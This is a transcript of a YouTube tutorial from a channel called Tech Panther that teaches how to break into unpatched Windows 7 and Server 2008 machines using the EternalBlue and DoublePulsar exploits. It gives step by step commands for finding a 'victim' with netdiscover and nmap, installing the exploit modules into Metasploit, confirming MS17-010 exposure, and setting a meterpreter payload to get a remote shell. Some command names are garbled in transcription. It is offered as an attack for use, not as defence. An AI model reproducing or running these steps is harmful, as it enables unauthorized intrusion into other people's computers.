Hello friends, welcome to Tech Panther YouTube channel, and today I will show you how you can hack Windows 7 or Server 2008 using EternalBlue and DoublePulsar exploit, and check if a system is vulnerable with this exploit. We didn't need to send any backdoor or any link to victim. We can hack victim with the help of IP address. EternalBlue is an exploit which is developed by US National Security Agency. It was leaked by a hacker group named Shadow Brokers, and it was used as a part of the worldwide WannaCry ransomware attack. EternalBlue exploits a vulnerability in Microsoft implementation of the SMB protocol. The Windows Security Update resolved the issue via Security Update MS17010. Many Windows users had not installed MS17010 when, 2 months later, the WannaCry attack used the EternalBlue vulnerability to spread itself. So let's start. You need Wine to be installed on your system. See the link in the description how to install Wine. First, for checking the vulnerability of a system, we need to download a script. Get the link from the description and go the link. Now click on this file. Click on Raw. Copy the URL. Now open Terminal, and type wget, and paste the link and hit enter. Now the script is downloaded. You can see that the script is downloaded. Now copy the script. Go to Computer, USR, Share, Metasploit Framework, Modules, Auxiliary, Scanner, SMB, and paste the script here. Now we have to download EternalBlue DoublePulsar Metasploit. Now copy the git clone URL. Now open Terminal, and type git clone, and paste the URL and hit enter. Now it will start downloading the files in root folder. Now copy both the files, and go to Computer, USR, Share, Metasploit Framework, Modules, Exploits, Windows, SMB, and paste it here. Now open this file in any text editor. Now change the path to USR, Share, Metasploit Framework, Modules, Exploits, Windows, SMB, Depths. Copy the same path and paste it in DoublePulsar. This path is same for both EternalBlue and DoublePulsar. You can change the process injection also. Set it to explorer.exe. And save the file. Open Terminal and type netdiscover. You can see the victim's IP address. Now get details about victim machine by nmap. Type nmap-o. Type victim IP address and hit enter. You can see open ports and operating system details. Now type service PostgreSQL start and hit enter. Type MSF console and hit enter. First we will check that if victim's machine is vulnerable or not. Type use auxiliary /scanner /smb /smb_ms17_010 and hit enter. Show options. Now we have to set the target host. Type set our hosts victim's IP address. Now type run. You can see that victim's machine is vulnerable. Now we will use the EternalBlue exploit to attack the victim's machine. Type use exploit /windows /smb /EternalBlue_DoublePulsar. Set payload Windows /x64 /meterpreter /dinds_tcp. Show options. We can change the process inject and target architecture. Set target IP address. Type our host victim's IP address. Now all set. Type run. You can see that we have successfully entered in Meterpreter shell. Now you can use post exploitations. See the link from the description that what you can do after you entered in Meterpreted shell. Thanks for watching. Please like and subscribe.